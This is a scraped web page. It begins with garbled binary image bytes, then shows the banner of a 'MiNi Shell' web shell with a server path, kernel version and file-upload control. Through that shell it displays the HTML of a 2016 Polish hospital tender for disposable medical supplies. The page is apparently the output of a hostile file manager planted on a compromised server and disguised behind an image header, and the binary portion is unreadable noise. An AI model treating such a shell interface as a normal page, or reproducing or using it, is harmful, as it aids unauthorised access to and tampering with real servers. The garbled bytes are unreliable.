JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160222/17687-N-2016.html

<p class="kh_header"><b>Pruszków: Dostawa sprzętu jednorazowego użytku dla potrzeb SP ZZOZ w Pruszkowie</b><br>
<b>Numer ogłoszenia: 17687 - 2016; data zamieszczenia: 22.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Armii Krajowej 2/4, 05-800 Pruszków, woj. mazowieckie, tel. 022 7588002, faks 022 7287138.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalnawrzesinie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SP ZZOZ w Pruszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż  i dostawa  sprzętu medycznego jednorazowego użytku i rękawic medycznych dla potrzeb SPZZOZ w Pruszkowie (z podziałem na 13 zadań - części) w następujących rodzajach i ilościach składających się odpowiednio na pakiety nr. 1- 13. Szczegółowe ilości i rodzaje sprzętu jednorazowego użytku składające się na poszczególne pakiety zawierają załączniki  2.1- 2.13..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia  do wykonywania określonej, w  specyfikacji istotnych warunków zamówienia, działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponowali potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy z dnia 29 stycznia  2004r. Prawo zamówień publicznych.
Zamawiający dokona oceny spełnienia powyższych warunków na podstawie całości oferty złożonej przez Wykonawcę, w szczególności dokumentów potwierdzających istnienie po stronie wykonawcy w/w atrybutów.  
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów.
Nie spełnienie chociażby jednego warunku określonego w pkt. od 1 do 4 skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalnawrzesinie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4- budynek administracji, pok. administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2016 godzina 09:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4- budynek administracji, Sekretariat SPZZOZ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Kaniula do wkłuć obwodowych 24G x 19 mm 	3600 szt.
2	 Kaniule do wkłuć obwodowych 22G x 25 mm	3000 szt.
3	 Kaniule do wkłuć obwodowych 20Gx33 mm	10000 szt.
4	 Kaniule do wkłuć obwodowych 18Gx 33 mm	7000 szt.
5	 Kaniule do wkłuć obwodowych 17Gx 45 mm	300 szt
6	 Kaniule do wkłuć obwodowych 16Gx 50 mm	300 szt
7	 Koreczki do kaniul	15000 szt
8	 Zastawka bezigłowa	600 szt
9	 Przyrząd do przetaczania z regulatorem	150 szt
10	 Pojemniki na odpady medyczne, pojemność 
0,7 l	1000 szt
11	 Pojemniki na odpady medyczne, pojemność 
1,0 l	1500 szt
12	Pojemniki na odpady medyczne, pojemność 
3,5 l	2500szt
13	 Igły  Pencil Point  24 G z prowadnicą 	250 szt.
14	 Igły  Pencil Point  25 G z prowadnicą 	360 szt.
15	 Igły  Pencil Point  26 G z prowadnicą 	100 szt
16	 Igła  Pencil Point  27 G z prowadnicą
	150 szt
17	 Kraniki trójdrożne 	 800 szt.
18	 Cewnik do podawania tlenu przez nos 	1500 szt.
19	 Przedłużacz do tlenu 2m - 2,1m	500 szt.
20	 Kateter do odsysania z pola operacyjnego CH 25 z końcówką Poole zagiętą ,długość drenu 2100 mm	1500 szt.
21	 Kateter do odsysania z ran dł. 70cm. Pakowane prosto nie zwijane  CH 14 	240 szt.
22	Kateter pediatryczny do żyły pępowinowej 4F, 6F, 8F (rozmiar w zależności od potrzeb szpitala)	40 szt.
23	Kateter do karmienia niemowląt, rozmiar 4F, 6F, 8F (w zależności od potrzeb szpitala)	50 szt.
24	 Dren PCV  średnica wewnętrzna 9 mm	60 mb
25	Zestaw do drenażu klatki piersiowej, 2butlowy,z regulacją	60 szt.
26	 Rury karbowane jednorazowe do aparatu do znieczuleń  o średnicy 22mm	600 mb
27	 Przedłużacz do tlenu z dwiema nasadkami CH 14 dł.  2 mb	500 szt.
28	Krótki kolec przelewowy do przelewania z fiolek w bezpieczny sposób typu Transofix	1000szt
29	Strzykawki do gazometrii  poj. 2,3ml. końcówka luer	2000 szt

30	 Ostrza chirurgiczne wymienne 10 typu Swann Morton	400 szt.
31	 Ostrza chirurgiczne wymienne 11 typu Swann Morton	400 szt.
32	 Ostrza chirurgiczne wymienne 15 typu Swann Morton	1 600 szt.
33	 Ostrza chirurgiczne wymienne 20 typu Swann Morton	700 szt.
34	 Ostrza chirurgiczne wymienne 23 typu Swann Morton	4 000 szt.
35	 Ostrza chirurgiczne wymienne  24 typu Swann Morton	6 300 szt.
36	 Terrmometr elektroniczny	40 szt.
37	 Fartuch ochronny foliowy dł 160cm	13 000 szt.
37	 Kieliszki plastikowe do leków ( op. = 75szt.)	600 op.
39	 Fartuch fizelinowy z mankietem	6 000 szt.
40	 Łącznik do drenów i ssaków o przekroju 10/8	 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Opis produktu	Ilość roczna
1	 Cewnik Pezzer 18	40 szt.
2	 Cewnik Pezzer 22 	50 szt.
3	 Cewnik Pezzer 24 	120 szt.
4	 Cewnik Pezzer 26 	200 szt.
5	 Cewnik Pezzer 28 	500 szt.
6	 Cewnik Pezzer 30 	260 szt.
7	 Cewnik Pezzer 32 	40 szt.
8	 Cewnik Nelaton 16	200 szt.
9	 Cewnik Nelaton 18	200 szt.
10	 Cewnik do odsysania górnych dróg oddechowych 6 dł. 40cm	240 szt
11	 Cewnik do odsysania górnych dróg oddechowych 8 dł. 40cm	240szt
12	 Cewnik do odsysania górnych dróg oddechowych 10dł. 40cm	2 600 szt.
13	 Cewnik do odsysania górnych dróg oddechowych 12	890 szt.
14	 Cewnik do odsysania górnych dróg oddechowych 14	880 szt.
15	 Cewnik do odsysania górnych dróg oddechowych 16	630 szt.
16	 Cewnik do odsysania górnych dróg oddechowych 18	510 szt.
17	 Sonda żołądkowa CH 14	60 szt.
18	Sonda żołądkowa  CH 16	250 szt.
19	Sonda żołądkowa  CH 18	250 szt.
20	 Sonda żołądkowa  CH 20	150 szt.
21	 Sonda żołądkowa  CH 22	160 szt.
22	 Sonda żołądkowa CH 24	230szt.
23	 Szpatułki drewniane ( op = 100szt)	100 op.
24	 Worki do dobowej zbiórki moczu 2 l -sterylne	8 000 szt.
25	 Wieszak do worków na mocz	720 szt.
26	 Woreczki na mocz dla dzieci męskie	2 400 szt.
27	 Woreczki na mocz  dla dzieci damskie	2 400 szt.
28	 Opaska identyfikacyjna dla noworodków 	3600 szt.
29	Opaska identyfikacyjna dla dorosłych 	6 000szt.
30	 Przedłużacz do pomp infuzyjnych białe 150 cm.                                                            	3000 szt
31	 Przedłużacz do tlenu, długość  min 4m do 6 m	200 szt.
32	 Igła 0,5x25 mm opakowanie 100 szt.	100 op.
33	 Igła 0,6x30 mm opakowanie 100 szt.	 10 op.
34	 Igła 0,7x30 mm opakowanie 100 szt.	 60 op.
35	 Igła 0,8x40 mm opakowanie 100 szt.	700 op.
36	 Igła 0,9x40 mm opakowanie 100 szt.	200 op.
37	 Igła 1,1x40 mm opakowanie 100 szt.	100 op.
38	 Igła 1,2x40 mm opakowanie 100 szt.	800 op.
39	 Przyrząd do przetaczania płynów 	30 000szt.
40	 Przyrząd do szybkiego przetaczania krwi 	30 szt.
41	 Przyrząd do przetaczania krwi 	1100 szt.
42	 Cewnik Foleya 10 	10szt.
43	 Cewnik Foleya 14 	320 szt.
44	 Cewnik Foleya 16 	1 410szt.
45	 Cewnik Foleya 18 	1 840 szt.
46	 Cewnik Foleya 20 	1 620 szt.
47	 Cewnik Foleya 22 	460 szt.
47	 Cewnik Foleya 24 	660 szt.
49	 Cewnik Foleya 26 	560 szt.
50	Cewnik Foley , wykonany z lateksu, pokrywany obustronnie elastomerem silikonu 18,20,22 (rozmiar  w zależności od potrzeb szpitala)	60szt
51	Worek do 14-dniowej zbiórki moczu w systemie zamkniętym, z drenem o długości 110 cm, workiem zbiorczym 2000ml	60szt
52	Dren łączący do odsysania z łącznikiem kapkon CH 24 	700szt
53	 Sonda Sengstakena roz. 18	   24 szt.
54	Łyżki jednorazowe do laryngoskopii 3 i 4	 240szt.
55	Maska tlenowa jednorazowa do tlenoterapii z drenem 	 600szt
56	Łącznik do rur karbowanych( trójnik z portem)	 160szt
57	Staza  jednorazowa	1000 op
58	Okulary do fototerapii	480szt
59	Maska tlenowa z nebulizatorem dla dorosłych	300szt
60	 Maski do ambu dla noworodków i niemowląt, rozmiar 0, 1 i 2 (w zależności od potrzeb szpitala)	20 szt.
61	Maski do tlenu z workiem dla dorosłych	600szt
62	Maski do ambu dla dorosłych, rozmiar 3, 4, 5 (w zależności od potrzeb szpitala)	50 szt
63	Zel do cewnikowania w ampułkostrzykawce 5ml i 10ml.	100 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość roczna
1	 Oddechowe filtry bakteryjno-wirusowe, mechaniczne 	3500 szt.
2	 Rurki tracheostomijne roz. 6 ; 7; 8;  9; 10 (rozmiar  w zależności od potrzeb szpitala)	30 szt.
  3	Siatka przepuklinowa  15x15	10 op.
  4	Siatka przepuklinowa 3x 5                                               8x13REFSPmm-35	64 op.
4	Siatka przepuklinowa 35x22 SPmm-149	3 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa sprzętu jednorazowego uzytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Rurki ustno - gardłowe jednorazowa, nr 3,4 (sterylne)	2000 szt.
2	Rurki ustno - gardłowe jednorazowa noworodkowe sterylna nr  0  dł 50mm 	24 szt.
3	 Rurki intubacyjne z mankietem niskociśnieniowym nr 6	50 szt.
4	Rurki intubacyjne z mankietem niskociśnieniowym nr 6,5	60 szt
5	  Rurki intubacyjne z mankietem niskociśnieniowym nr 7	600 szt.
6	Rurki intubacyjne z mankietem niskociśnieniowym nr 7,5	600 szt.
7	  Rurki intubacyjne z mankietem niskociśnieniowym nr 8	600 szt.
8	  Rurki intubacyjne z mankietem niskociśnieniowym nr 8,5	400 szt.
9	  Rurki intubacyjne z mankietem niskociśnieniowym nr 9	200 szt.
10	 Rurki intubacyjne z mankietem niskociśnieniowym nr 10	100szt
11	  Rurki intubacyjne zbrojone niskociśnieniowe nr 6, 7, 8 (rozmiar w zależności od potrzeb szpitala)	 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość roczna
1	 Drainobag 40   z uniwersalnym łącznikiem do   drenów Ch.6-18 (mieszek ssący)	500 szt.
2	 Strzykawka j.u. dwuczęściowa 2ml, , opakowanie 100szt	400 op.
3	 Strzykawka j.u. dwuczęściowa 5ml, , opakowanie 100szt	500 op.
4	 Strzykawka j.u. dwuczęściowa 10ml, , opakowanie 100 sztuk	500 op.
5	 Strzykawka j. u. dwuczęściowa 20ml, , opakowanie 100szt	700 op.
6	 Strzykawka biała 50ml (60ml) do pomp infuzyjnych 	6000 szt.
7	Strzykawka bursztynowa 50ml (60ml) do pomp infuzyjnych	300 szt.
8	Rampa kranikowa 5-drożna	40szt
9	Zestaw do żyły głównej zakładany metodą Seldingera	40szt
10	 Strzykawka j.u. 1ml U40 do insuliny , opakowanie 100 szt.	25 op.
11	 Aparat do przygotowywania i pobierania leków z butelek	2500 szt
12	 Zestaw do ZO  z cewnikiem i strzykawką niskooporową( w zależności od potrzeb szpitala)	60 szt.
13	 Przyrząd do przetaczania płynów  po opróżnieniu jeziorka zatrzymujący płyn w drenie	10 000 szt
14	 Strzykawka 100ml Janetta	1 000 szt.
15	 Zaciskacz do pępowiny mikrobiologicznie czysty	2 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Elektrody do EKG dla dorosłych	20000 szt.
2	Papier do EKG Aspel  112x25	800 rolek
3	Papier do KTG BTL FC-1400	30 szt.
4	Papier do KTG typ SRF 618 B/210 termoczuły  o szer.112mm  112 x 100x  150	400 bl
5	Żel do EKG 0,5 l	60 szt.
6	Żel do USG  5 l  Agvasonic 100	40 szt.
7	Żel do USG  0,5 l	520 szt.
8	Papier  do defibrylatora  roz. 107,75* 23	  30 rolek
9	Papier Mitsubishi K61B - oryginalny	300 szt.
10	Papier do EKG Ascard  RB1 v.001  58x25	20 rolek
11	Papier do KTG Sonicard Oxford Team 143x150x300	150 bl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość roczna	Producent
1	Wzierniki jednorazowe plastikowe   S 	5600 szt.	
2	Wzierniki jednorazowe plastikowe   M      6000 szt.	
3	Wzierniki jednorazowe plastikowe   L 	1800 szt.	
4	Szkiełka do cytologii   op = 50szt.	70 op.	
5	Osłonki lateksowe na głowice USG 1op. -200szt.	12op.	
6	Szczoteczki do cytologii sterylne - spiralka	1000 szt	
7	Szczoteczki do cytologii wachlarz  sterylne 1op. =50szt	45op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
